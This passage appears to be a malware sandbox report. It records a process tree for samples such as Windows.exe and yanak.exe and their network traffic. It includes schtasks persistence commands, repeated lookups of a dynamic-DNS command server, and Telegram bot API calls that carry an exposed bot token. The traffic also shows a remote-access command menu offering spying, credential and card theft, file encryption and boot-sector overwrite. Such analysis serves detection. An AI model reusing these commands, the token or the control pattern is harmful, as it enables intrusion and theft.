        
        PID:2460
      - C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3220
      - C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:3480
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe" /rl HIGHEST /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4384
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ulaoUaWfhlgw.bat" "
        7⤵
        
        PID:4344
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:4812
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3500
        
        C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:4932
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe" /rl HIGHEST /f
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3356
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bHH94JbDvoUt.bat" "
        9⤵
        
        PID:4436
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        10⤵
        
        PID:1616
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        10⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4356
        
        C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe"
        10⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:1636
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe" /rl HIGHEST /f
        11⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3960
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dV7tuiDl3Ibn.bat" "
        11⤵
        
        PID:2036
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        12⤵
        
        PID:1376
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4528
        
        C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe"
        12⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:4952
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe" /rl HIGHEST /f
        13⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1764
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TZXINw8L4bq8.bat" "
        13⤵
        
        PID:4880
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        14⤵
        
        PID:3924
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        14⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4600
        
        C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe"
        14⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:3348
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe" /rl HIGHEST /f
        15⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4936
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3O8EQ8xAMoQl.bat" "
        15⤵
        
        PID:4040
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        16⤵
        
        PID:2688
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        16⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:768
        
        C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe"
        16⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:732
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe" /rl HIGHEST /f
        17⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4696
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TIlYL6urv3ff.bat" "
        17⤵
        
        PID:3324
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        18⤵
        
        PID:4808
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        18⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4552
        
        C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe"
        18⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1044
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe" /rl HIGHEST /f
        19⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4136
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\taJVbm9erl1g.bat" "
        19⤵
        
        PID:4596
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        20⤵
        
        PID:4812
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        20⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4248
        
        C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe"
        20⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4020
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe" /rl HIGHEST /f
        21⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:316
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hwzvfzAZGtsn.bat" "
        21⤵
        
        PID:428
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        22⤵
        
        PID:4856
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        22⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4332

C:\Users\Admin\Desktop\cs2go.exe
"C:\Users\Admin\Desktop\cs2go.exe"
1⤵
- Executes dropped EXE
PID:2348

C:\Windows\system32\launchtm.exe
launchtm.exe /2
1⤵
PID:2072
- C:\Windows\System32\Taskmgr.exe
  "C:\Windows\System32\Taskmgr.exe" /2
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:896

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x498 0x3fc
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1812

Network

DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

104.219.191.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

104.219.191.52.in-addr.arpa

IN PTR

Response
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
DNS

72.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

72.32.126.40.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

149.220.183.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

149.220.183.52.in-addr.arpa

IN PTR

Response
DNS

50.23.12.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

50.23.12.20.in-addr.arpa

IN PTR

Response
DNS

206.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.23.85.13.in-addr.arpa

IN PTR

Response
DNS

88.210.23.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

88.210.23.2.in-addr.arpa

IN PTR

Response

88.210.23.2.in-addr.arpa

IN PTR

a2-23-210-88deploystaticakamaitechnologiescom
DNS

14.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.227.111.52.in-addr.arpa

IN PTR

Response
DNS

riprealworld.ddns.net

Windows.exe

Remote address:

8.8.8.8:53

Request

riprealworld.ddns.net

IN A

Response
DNS

riprealworld.ddns.net

Windows.exe

Remote address:

8.8.8.8:53

Request

riprealworld.ddns.net

IN A

Response
DNS

riprealworld.ddns.net

Windows.exe

Remote address:

8.8.8.8:53

Request

riprealworld.ddns.net

IN A

Response
DNS

riprealworld.ddns.net

Windows.exe

Remote address:

8.8.8.8:53

Request

riprealworld.ddns.net

IN A

Response
DNS

riprealworld.ddns.net

Windows.exe

Remote address:

8.8.8.8:53

Request

riprealworld.ddns.net

IN A

Response
DNS

riprealworld.ddns.net

Windows.exe

Remote address:

8.8.8.8:53

Request

riprealworld.ddns.net

IN A

Response
DNS

riprealworld.ddns.net

Windows.exe

Remote address:

8.8.8.8:53

Request

riprealworld.ddns.net

IN A

Response
DNS

riprealworld.ddns.net

Windows.exe

Remote address:

8.8.8.8:53

Request

riprealworld.ddns.net

IN A

Response
DNS

riprealworld.ddns.net

Windows.exe

Remote address:

8.8.8.8:53

Request

riprealworld.ddns.net

IN A

Response
DNS

google.com

yanak.exe

Remote address:

8.8.8.8:53

Request

google.com

IN A

Response

google.com

IN A

142.250.187.238
DNS

api.telegram.org

yanak.exe

Remote address:

8.8.8.8:53

Request

api.telegram.org

IN A

Response

api.telegram.org

IN A

149.154.167.220
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/sendMessage?chat_id=5569740835&text=%F0%9F%8D%80%20Bot%20connected

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/sendMessage?chat_id=5569740835&text=%F0%9F%8D%80%20Bot%20connected HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:26:57 GMT
Content-Type: application/json
Content-Length: 262
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:26:57 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=1

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=1 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:26:58 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=2

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=2 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:26:59 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=3

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=3 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:00 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=4

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=4 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:01 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=5

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=5 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:02 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=6

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=6 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:03 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=7

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=7 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:04 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=8

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=8 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:05 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=9

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=9 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:06 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=10

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=10 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:07 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=11

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=11 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:08 GMT
Content-Type: application/json
Content-Length: 348
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/sendMessage?chat_id=5569740835&text=%0A%20%F0%9F%8C%8E%20INFORMATION:%0A%20/ComputerInfo%0A%20/BatteryInfo%0A%20/Location%0A%20/Whois%0A%20/ActiveWindow%0A%0A%F0%9F%8E%A7%20SPYING:%0A%20/Webcam%20%3Ccamera%3E%20%3Cdelay%3E%0A%20/Microphone%20%3Cseconds%3E%0A%20/Desktop%0A%20/Keylogger%0A%0A%F0%9F%93%8B%20CLIPBOARD:%0A%20/ClipboardSet%20%3Ctext%3E%0A%20/ClipboardGet%0A%0A%F0%9F%93%8A%20TASKMANAGER:%0A%20/ProcessList%0A%20/ProcessKill%20%3Cprocess%3E%0A%20/ProcessStart%20%3Cprocess%3E%0A%20/TaskManagerDisable%0A%20/TaskManagerEnable%0A%0A%20/MinimizeAllWindows%0A%20/MaximizeAllWindows%0A%0A%F0%9F%92%B3%20STEALER:%0A%20/GetPasswords%0A%20/GetCreditCards%0A%20/GetHistory%0A%20/GetBookmarks%0A%20/GetCookies%0A%20/GetDesktop%0A%20/GetFileZilla%0A%20/GetDiscord%0A%20/GetTelegram%0A%20/GetSteam%0A%0A%F0%9F%92%BF%20CD-ROM:%0A%20/OpenCD%0A%20/CloseCD%0A%0A%F0%9F%92%BC%20FILES:%0A%20/DownloadFile%20%3Cfile/dir%3E%0A%20/UploadFile%20%3Cdrop/url%3E%0A%20/RunFile%20%3Cfile%3E%0A%20/RunFileAdmin%20%3Cfile%3E%0A%20/ListFiles%20%3Cdir%3E%0A%20/RemoveFile%20%3Cfile%3E%0A%20/RemoveDir%20%3Cdir%3E%0A%20/MoveFile%20%3Cfilr%3E%20%3Cfile%3E%0A%20/CopyFile%20%3Cfile%3E%20%3Cfile%3E%0A%20/MoveDir%20%3Cdir%3E%20%3Cdir%3E%0A%20/CopyDir%20%3Cdir%3E%20%3Cdir%3E%0A%0A%F0%9F%9A%80%20COMMUNICATION:%0A%20/Speak%20%3Ctext%3E%0A%20/Shell%20%3Ccommand%3E%0A%20/MessageBox%20%3Cerror/info/warn%3E%20%3Ctext%3E%0A%20/OpenURL%20%3Curl%3E%0A%20/SetWallpaper%20%3Cfile%3E%0A%20/SendKeyPress%20%3Ckeys%3E%0A%20/NetDiscover%20%3Cto%3E%0A%20/Uninstall%0A%0A%F0%9F%94%8A%20AUDIO:%20%0A%20/PlayMusic%20%3Cfile%3E%0A%20/AudioVolumeSet%20%3C0-100%3E%0A%20/AudioVolumeGet%0A%0A%F0%9F%92%A3%20EVIL:%0A%20/BlockInput%20%3Cseconds%3E%0A%20/Monitor%20%3Con/off/standby%3E%0A%20/DisplayRotate%20%3C0,90,180,270%3E%0A%20/EncryptFileSystem%20%3Cpassword%3E%0A%20/DecryptFileSystem%20%3Cpassword%3E%0A%20/ForkBomb%0A%20/BSoD%0A%20/OverwriteBootSector%0A%0A%F0%9F%92%A1%20POWER:%0A%20/Shutdown%0A%20/Reboot%0A%20/Hibernate%0A%20/Logoff%0A%0A%F0%9F%92%B0%20OTHER:%0A%20/Help%0A%20/About

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/sendMessage?chat_id=5569740835&text=%0A%20%F0%9F%8C%8E%20INFORMATION:%0A%20/ComputerInfo%0A%20/BatteryInfo%0A%20/Location%0A%20/Whois%0A%20/ActiveWindow%0A%0A%F0%9F%8E%A7%20SPYING:%0A%20/Webcam%20%3Ccamera%3E%20%3Cdelay%3E%0A%20/Microphone%20%3Cseconds%3E%0A%20/Desktop%0A%20/Keylogger%0A%0A%F0%9F%93%8B%20CLIPBOARD:%0A%20/ClipboardSet%20%3Ctext%3E%0A%20/ClipboardGet%0A%0A%F0%9F%93%8A%20TASKMANAGER:%0A%20/ProcessList%0A%20/ProcessKill%20%3Cprocess%3E%0A%20/ProcessStart%20%3Cprocess%3E%0A%20/TaskManagerDisable%0A%20/TaskManagerEnable%0A%0A%20/MinimizeAllWindows%0A%20/MaximizeAllWindows%0A%0A%F0%9F%92%B3%20STEALER:%0A%20/GetPasswords%0A%20/GetCreditCards%0A%20/GetHistory%0A%20/GetBookmarks%0A%20/GetCookies%0A%20/GetDesktop%0A%20/GetFileZilla%0A%20/GetDiscord%0A%20/GetTelegram%0A%20/GetSteam%0A%0A%F0%9F%92%BF%20CD-ROM:%0A%20/OpenCD%0A%20/CloseCD%0A%0A%F0%9F%92%BC%20FILES:%0A%20/DownloadFile%20%3Cfile/dir%3E%0A%20/UploadFile%20%3Cdrop/url%3E%0A%20/RunFile%20%3Cfile%3E%0A%20/RunFileAdmin%20%3Cfile%3E%0A%20/ListFiles%20%3Cdir%3E%0A%20/RemoveFile%20%3Cfile%3E%0A%20/RemoveDir%20%3Cdir%3E%0A%20/MoveFile%20%3Cfilr%3E%20%3Cfile%3E%0A%20/CopyFile%20%3Cfile%3E%20%3Cfile%3E%0A%20/MoveDir%20%3Cdir%3E%20%3Cdir%3E%0A%20/CopyDir%20%3Cdir%3E%20%3Cdir%3E%0A%0A%F0%9F%9A%80%20COMMUNICATION:%0A%20/Speak%20%3Ctext%3E%0A%20/Shell%20%3Ccommand%3E%0A%20/MessageBox%20%3Cerror/info/warn%3E%20%3Ctext%3E%0A%20/OpenURL%20%3Curl%3E%0A%20/SetWallpaper%20%3Cfile%3E%0A%20/SendKeyPress%20%3Ckeys%3E%0A%20/NetDiscover%20%3Cto%3E%0A%20/Uninstall%0A%0A%F0%9F%94%8A%20AUDIO:%20%0A%20/PlayMusic%20%3Cfile%3E%0A%20/AudioVolumeSet%20%3C0-100%3E%0A%20/AudioVolumeGet%0A%0A%F0%9F%92%A3%20EVIL:%0A%20/BlockInput%20%3Cseconds%3E%0A%20/Monitor%20%3Con/off/standby%3E%0A%20/DisplayRotate%20%3C0,90,180,270%3E%0A%20/EncryptFileSystem%20%3Cpassword%3E%0A%20/DecryptFileSystem%20%3Cpassword%3E%0A%20/ForkBomb%0A%20/BSoD%0A%20/OverwriteBootSector%0A%0A%F0%9F%92%A1%20POWER:%0A%20/Shutdown%0A%20/Reboot%0A%20/Hibernate%0A%20/Logoff%0A%0A%F0%9F%92%B0%20OTHER:%0A%20/Help%0A%20/About HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:09 GMT
Content-Type: application/json
Content-Length: 4949
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293321

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293321 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:10 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293322

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293322 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:11 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293323

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293323 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

